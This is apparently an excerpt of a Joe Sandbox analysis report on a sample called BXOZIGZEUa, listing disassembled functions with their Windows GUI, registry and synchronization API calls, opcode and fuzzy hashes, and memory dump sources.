                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: EmptyRect$H_prolog3
                                                              • String ID: (;`
                                                              • API String ID: 3752103406-3089055786
                                                              • Opcode ID: 8d1e0248bf706e53ce7219e87ebfbd6963a6f8c180b0780a088726a5e5cddb22
                                                              • Instruction ID: abee29a21e7b04c46d21ff8d4c9811820f260bf3294096f48ec1ce9225e9f56a
                                                              • Opcode Fuzzy Hash: 8d1e0248bf706e53ce7219e87ebfbd6963a6f8c180b0780a088726a5e5cddb22
                                                              • Instruction Fuzzy Hash: DA3129B0942B068FC3669F6AC5C868AFBE8BF48300F90892ED0AE97211C7707644CF45
                                                              APIs
                                                              • GetCursorPos.USER32(?), ref: 0053B409
                                                              • GetParent.USER32(?), ref: 0053B412
                                                                • Part of subcall function 004DACFF: __CxxThrowException@8.LIBCMT ref: 004DAD15
                                                                • Part of subcall function 004DACFF: __EH_prolog3.LIBCMT ref: 004DAD22
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: CursorException@8H_prolog3ParentThrow
                                                              • String ID: `c$c
                                                              • API String ID: 494443650-2814568683
                                                              • Opcode ID: 7145578484253d38a267b8194fe5ab6269c666c9945eb40cea9b237d998674ad
                                                              • Instruction ID: c38db6c1eca0ed5d6b31854686b2c06c4a46011b13e5596741fbdace9f4135ac
                                                              • Opcode Fuzzy Hash: 7145578484253d38a267b8194fe5ab6269c666c9945eb40cea9b237d998674ad
                                                              • Instruction Fuzzy Hash: 0611AC32600204BFDF006FA68C49DAE7BAEFF89315B10407EB605C6251EB359D008BA4
                                                              APIs
                                                              • FillRect.USER32(?,?), ref: 00502E15
                                                              • InflateRect.USER32(?,000000FF,000000FF), ref: 00502E4C
                                                              • DrawEdge.USER32(?,?,00000000,0000000F), ref: 00502E6C
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: Rect$DrawEdgeFillInflate
                                                              • String ID: iii
                                                              • API String ID: 785442924-940974255
                                                              • Opcode ID: 55b6310d77028ebd1e2f4b52cd51d505d88f2a22541bc5785f0518e5425f11f3
                                                              • Instruction ID: 74ccb60563ee413bf34e9dbeea1971cc55001ef6759e45db21b1e01316fd5a42
                                                              • Opcode Fuzzy Hash: 55b6310d77028ebd1e2f4b52cd51d505d88f2a22541bc5785f0518e5425f11f3
                                                              • Instruction Fuzzy Hash: D711DA75500209AFCF00DFA4DD859EF7BB9FB49324B104626B915EB191DB34AA09DB60
                                                              APIs
                                                                • Part of subcall function 004E61F6: EnterCriticalSection.KERNEL32(00643728,?,?,00000000,?,004E124C,00000010,00000008,004DF8A5,004DF83C,004DAD1B,004DA2E2,?,?,004D106C,00000000), ref: 004E6230
                                                                • Part of subcall function 004E61F6: InitializeCriticalSection.KERNEL32(?,?,?,00000000,?,004E124C,00000010,00000008,004DF8A5,004DF83C,004DAD1B,004DA2E2,?,?,004D106C,00000000), ref: 004E6242
                                                                • Part of subcall function 004E61F6: LeaveCriticalSection.KERNEL32(00643728,?,?,00000000,?,004E124C,00000010,00000008,004DF8A5,004DF83C,004DAD1B,004DA2E2,?,?,004D106C,00000000), ref: 004E624F
                                                                • Part of subcall function 004E61F6: EnterCriticalSection.KERNEL32(?,?,?,00000000,?,004E124C,00000010,00000008,004DF8A5,004DF83C,004DAD1B,004DA2E2,?,?,004D106C,00000000), ref: 004E625F
                                                              • CreateBitmap.GDI32(00000008,00000008,00000001,00000001,0051358B), ref: 0051336D
                                                              • CreatePatternBrush.GDI32(00000000), ref: 0051337A
                                                              • DeleteObject.GDI32(00000000), ref: 00513386
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: CriticalSection$CreateEnter$BitmapBrushDeleteInitializeLeaveObjectPattern
                                                              • String ID: h fd
                                                              • API String ID: 3767330792-2665688944
                                                              • Opcode ID: 7fcf9ca4949d41533792870acbe5601f21464889a57ae17807b4dde0f007125b
                                                              • Instruction ID: 900944cd01e025692f451a6d219bb1b793c8e2da91063e0ac3f8b6f459ca55ba
                                                              • Opcode Fuzzy Hash: 7fcf9ca4949d41533792870acbe5601f21464889a57ae17807b4dde0f007125b
                                                              • Instruction Fuzzy Hash: E401FE305403046BEB00BB78DD16BED3ED5FB5A711F01056DF501D71D1CE644989C766
                                                              APIs
                                                                • Part of subcall function 004E61F6: EnterCriticalSection.KERNEL32(00643728,?,?,00000000,?,004E124C,00000010,00000008,004DF8A5,004DF83C,004DAD1B,004DA2E2,?,?,004D106C,00000000), ref: 004E6230
                                                                • Part of subcall function 004E61F6: InitializeCriticalSection.KERNEL32(?,?,?,00000000,?,004E124C,00000010,00000008,004DF8A5,004DF83C,004DAD1B,004DA2E2,?,?,004D106C,00000000), ref: 004E6242
                                                                • Part of subcall function 004E61F6: LeaveCriticalSection.KERNEL32(00643728,?,?,00000000,?,004E124C,00000010,00000008,004DF8A5,004DF83C,004DAD1B,004DA2E2,?,?,004D106C,00000000), ref: 004E624F
                                                                • Part of subcall function 004E61F6: EnterCriticalSection.KERNEL32(?,?,?,00000000,?,004E124C,00000010,00000008,004DF8A5,004DF83C,004DAD1B,004DA2E2,?,?,004D106C,00000000), ref: 004E625F
                                                                • Part of subcall function 004E1231: __EH_prolog3_catch.LIBCMT ref: 004E1238
                                                                • Part of subcall function 004DACFF: __CxxThrowException@8.LIBCMT ref: 004DAD15
                                                                • Part of subcall function 004DACFF: __EH_prolog3.LIBCMT ref: 004DAD22
                                                              • GetProcAddress.KERNEL32(00000000,HtmlHelpW), ref: 004EACF9
                                                              • FreeLibrary.KERNEL32(?), ref: 004EAD09
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: CriticalSection$Enter$AddressException@8FreeH_prolog3H_prolog3_catchInitializeLeaveLibraryProcThrow
                                                              • String ID: HtmlHelpW$hhctrl.ocx
                                                              • API String ID: 2853499158-3773518134
                                                              • Opcode ID: 84ab751c8565b1fbc7f7e09b26182fc3a54366dad3d9e36fa9e18a80a467dc3e
                                                              • Instruction ID: 0fde52b6bade81f746e05d3b0000b33bea9be03a1e87c5de0ad102d06e9f2603
                                                              • Opcode Fuzzy Hash: 84ab751c8565b1fbc7f7e09b26182fc3a54366dad3d9e36fa9e18a80a467dc3e
                                                              • Instruction Fuzzy Hash: 7F01D631140747ABDB212F63CC09F2B7A95EF107A7F10881BF91A91561DB7CE460E65B
                                                              APIs
                                                              • GetWindowLongW.USER32(?,000000F0), ref: 004E0F2A
                                                              • GetClassNameW.USER32(?,?,0000000A), ref: 004E0F3F
                                                              • CompareStringW.KERNEL32(00000409,00000001,?,000000FF,combobox,000000FF), ref: 004E0F59
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: ClassCompareLongNameStringWindow
                                                              • String ID: combobox
                                                              • API String ID: 1414938635-2240613097
                                                              • Opcode ID: 5f9331c1f84b63c54e89958ce3b5e01c9faaef8d0da93c19868c299dda92d86d
                                                              • Instruction ID: d4cc074332e9eaad583bb485bd2bae3ef00731770785f7eb2459c8f848c42dc2
                                                              • Opcode Fuzzy Hash: 5f9331c1f84b63c54e89958ce3b5e01c9faaef8d0da93c19868c299dda92d86d
                                                              • Instruction Fuzzy Hash: B8F0F432645218BFCB10EB689C06EBE3BA8EB06720F500705F522E61C0CEA8A9459795
                                                              APIs
                                                              • KillTimer.USER32(?,00000002), ref: 0052F49F
                                                              • GetFocus.USER32 ref: 0052F4AB
                                                              • RedrawWindow.USER32(?,00000000,00000000,00000105,00000000), ref: 0052F4DC
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: FocusKillRedrawTimerWindow
                                                              • String ID: y
                                                              • API String ID: 1950525498-4225443349
                                                              • Opcode ID: c68334409cad7d3ef82f4a40a13d64d8803d9d696d4a37e5d067ed314fc60a8c
                                                              • Instruction ID: d545c1b751f8389964d31d3fec3fe66443abe70bc858f7f7719e6d3a61b60c96
                                                              • Opcode Fuzzy Hash: c68334409cad7d3ef82f4a40a13d64d8803d9d696d4a37e5d067ed314fc60a8c
                                                              • Instruction Fuzzy Hash: 49F06D32610224ABDF347B61F808B6B3B75BF26715F20843AE516850E1DAF59840DB81
                                                              APIs
                                                              • GetModuleHandleW.KERNEL32(Advapi32.dll), ref: 004E184F
                                                              • GetProcAddress.KERNEL32(00000000,RegCreateKeyTransactedW), ref: 004E185F
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: AddressHandleModuleProc
                                                              • String ID: Advapi32.dll$RegCreateKeyTransactedW
                                                              • API String ID: 1646373207-2994018265
                                                              • Opcode ID: f6b69d3e7eda1e242989b5e40beed6af441bb760e6bf2f993d7fe4b6f4aba81e
                                                              • Instruction ID: 66f10855809299a24e481936d0c44e3cf01b526e14bc7c8b02d4cd6da059086d
                                                              • Opcode Fuzzy Hash: f6b69d3e7eda1e242989b5e40beed6af441bb760e6bf2f993d7fe4b6f4aba81e
                                                              • Instruction Fuzzy Hash: 51F01932180249FBCF122F919C04EFA3BA9FB08752F054426FA1991070D77AC460EB55
                                                              APIs
                                                              • GetModuleHandleW.KERNEL32(Advapi32.dll), ref: 004E17F6
                                                              • GetProcAddress.KERNEL32(00000000,RegOpenKeyTransactedW), ref: 004E1806
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: AddressHandleModuleProc
                                                              • String ID: Advapi32.dll$RegOpenKeyTransactedW
                                                              • API String ID: 1646373207-3913318428
                                                              • Opcode ID: 8c265c12c4c76a895590b879126ff9eef0b16e2daae73aa0ac77ded1b287dde7
                                                              • Instruction ID: 717da5e914de9fd1b3b0f91c0e4a49709a83a7fcd0485c0aa826dabab9951348
                                                              • Opcode Fuzzy Hash: 8c265c12c4c76a895590b879126ff9eef0b16e2daae73aa0ac77ded1b287dde7
                                                              • Instruction Fuzzy Hash: BDF0307228024AEBCF212F919C08FB63BA9FB14752F084426F55591170DB7984A4EB95
                                                              APIs
                                                              • GetModuleHandleW.KERNEL32(kernel32.dll), ref: 005149C8
                                                              • GetProcAddress.KERNEL32(00000000,GetFileAttributesTransactedW), ref: 005149D8
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: AddressHandleModuleProc
                                                              • String ID: GetFileAttributesTransactedW$kernel32.dll
                                                              • API String ID: 1646373207-1378992308
                                                              • Opcode ID: 4b4ccd479c750982ec0da5458d01b19104cf863375707db6e834ebef0aebd6de
                                                              • Instruction ID: da32f69cc21bda6daf9c34fd835b636ac87290e2789fde06fa36eb3260fb57bf
                                                              • Opcode Fuzzy Hash: 4b4ccd479c750982ec0da5458d01b19104cf863375707db6e834ebef0aebd6de
                                                              • Instruction Fuzzy Hash: 3FF03032240206EBEF251F959C08BF67F99FF04B51F04552AF515C1060DE79C8D0EE90
                                                              APIs
                                                              • __EH_prolog3_GS.LIBCMT ref: 005286B4
                                                              • GetWindowRect.USER32(?,?), ref: 005288AC
                                                              • GetParent.USER32(?), ref: 00528930
                                                              • GetParent.USER32(?), ref: 00528C24
                                                                • Part of subcall function 0052DF57: GetParent.USER32(?), ref: 0052DF88
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: Parent$H_prolog3_RectWindow
                                                              • String ID:
                                                              • API String ID: 3969657074-0
                                                              • Opcode ID: bac9b138ac2f9bd968af5f1dca57923b475c02924f818bf3703684d5a0f7cb8b
                                                              • Instruction ID: 2210f46ed875be1a82666d44be9709313d1672c2e9a91b42537b3cb766b5fe99
                                                              • Opcode Fuzzy Hash: bac9b138ac2f9bd968af5f1dca57923b475c02924f818bf3703684d5a0f7cb8b
                                                              • Instruction Fuzzy Hash: A8124470A01209AFCF05EFE9D899ABDBBB6BF48315F14012EF416A7291DF385A01CB51
                                                              APIs
                                                                • Part of subcall function 004E015C: ClientToScreen.USER32(?,?), ref: 004E016D
                                                                • Part of subcall function 004E015C: ClientToScreen.USER32(?,?), ref: 004E017A
                                                                • Part of subcall function 00551251: SetRectEmpty.USER32(?), ref: 0055125E
                                                                • Part of subcall function 00551251: GetWindowRect.USER32(?,?), ref: 0055126F
                                                              • IsRectEmpty.USER32(?), ref: 005538FB
                                                              • RedrawWindow.USER32(?,00000000,00000000,00000105), ref: 0055398C
                                                              • GetWindowRect.USER32(?,?), ref: 00553C2B
                                                              • EqualRect.USER32(?,?), ref: 00553C44
                                                                • Part of subcall function 0055164A: GetWindowRect.USER32(?,?), ref: 00551681
                                                                • Part of subcall function 0055164A: OffsetRect.USER32(?,00000000,?), ref: 005516AB
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: Rect$Window$ClientEmptyScreen$EqualOffsetRedraw
                                                              • String ID:
                                                              • API String ID: 1200911113-0
                                                              • Opcode ID: 6c1486697c8f435a5f96849714fc918ed04bd6d6ef04e4ffa6af5f3149812fd8
                                                              • Instruction ID: fd872ea54eba0d9cf4b56de7e6cc77cb3031c040be441ee28ac64de5d4e96458
                                                              • Opcode Fuzzy Hash: 6c1486697c8f435a5f96849714fc918ed04bd6d6ef04e4ffa6af5f3149812fd8
                                                              • Instruction Fuzzy Hash: 5DF15F71A00209DFCF24DFA9C8A8AADBFB5FF84791F14401BE805AB251DB709E49CB50
                                                              APIs
                                                              • GetWindowRect.USER32(?,?), ref: 0050AB78
                                                              • CopyRect.USER32(?,?), ref: 0050AB83
                                                              • GetClientRect.USER32(?,?), ref: 0050AB9C
                                                              • SystemParametersInfoW.USER32(00000026,00000000,?,00000000), ref: 0050AD32
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: Rect$ClientCopyInfoParametersSystemWindow
                                                              • String ID:
                                                              • API String ID: 1264264222-0
                                                              • Opcode ID: 68934a4074d3cd97f40d344c8a8971572eac6ee9586a2e2471deda52e8bddf72
                                                              • Instruction ID: e90ae77fa301bf2b6cbbc01301474a186f964a524ee5d5f2de242cd3c7feb583
                                                              • Opcode Fuzzy Hash: 68934a4074d3cd97f40d344c8a8971572eac6ee9586a2e2471deda52e8bddf72
                                                              • Instruction Fuzzy Hash: ED813C71D00619EFCF14DFA8C9889AEBBB5FF48701F11856AE806AB244DB34AD45CF91
                                                              APIs
                                                              • CreateCompatibleDC.GDI32(?), ref: 0054ECAF
                                                              • CreateCompatibleBitmap.GDI32(?,?,?), ref: 0054ECC9
                                                              • GetObjectW.GDI32(?,00000018,?), ref: 0054EDD2
                                                                • Part of subcall function 004DACFF: __CxxThrowException@8.LIBCMT ref: 004DAD15
                                                                • Part of subcall function 004DACFF: __EH_prolog3.LIBCMT ref: 004DAD22
                                                              • InvalidateRect.USER32(?,00000000,00000001,?,00000000,?,?,?), ref: 0054EE65
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: CompatibleCreate$BitmapException@8H_prolog3InvalidateObjectRectThrow
                                                              • String ID:
                                                              • API String ID: 103296630-0
                                                              • Opcode ID: 451bd5e71a9435da8fe3b8dd94f7a582af79e42dc60183c732f29e906ef3fd39
                                                              • Instruction ID: 9b57fa6c8f4bef28d9b4d12c62f291ab67a489e4df6c6b847818a5672193df5d
                                                              • Opcode Fuzzy Hash: 451bd5e71a9435da8fe3b8dd94f7a582af79e42dc60183c732f29e906ef3fd39
                                                              • Instruction Fuzzy Hash: 1E718271900599AFCB25DB61CC55EEEBBB9FF44308F10449DE906A3281DBB46E84CF64
                                                              APIs
                                                              • GetClientRect.USER32(?,?), ref: 0053159F
                                                              • SetRectEmpty.USER32(?), ref: 005315F8
                                                              • OffsetRect.USER32(?,00000000,?), ref: 0053169F
                                                              • SetRectEmpty.USER32(?), ref: 005316F5
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
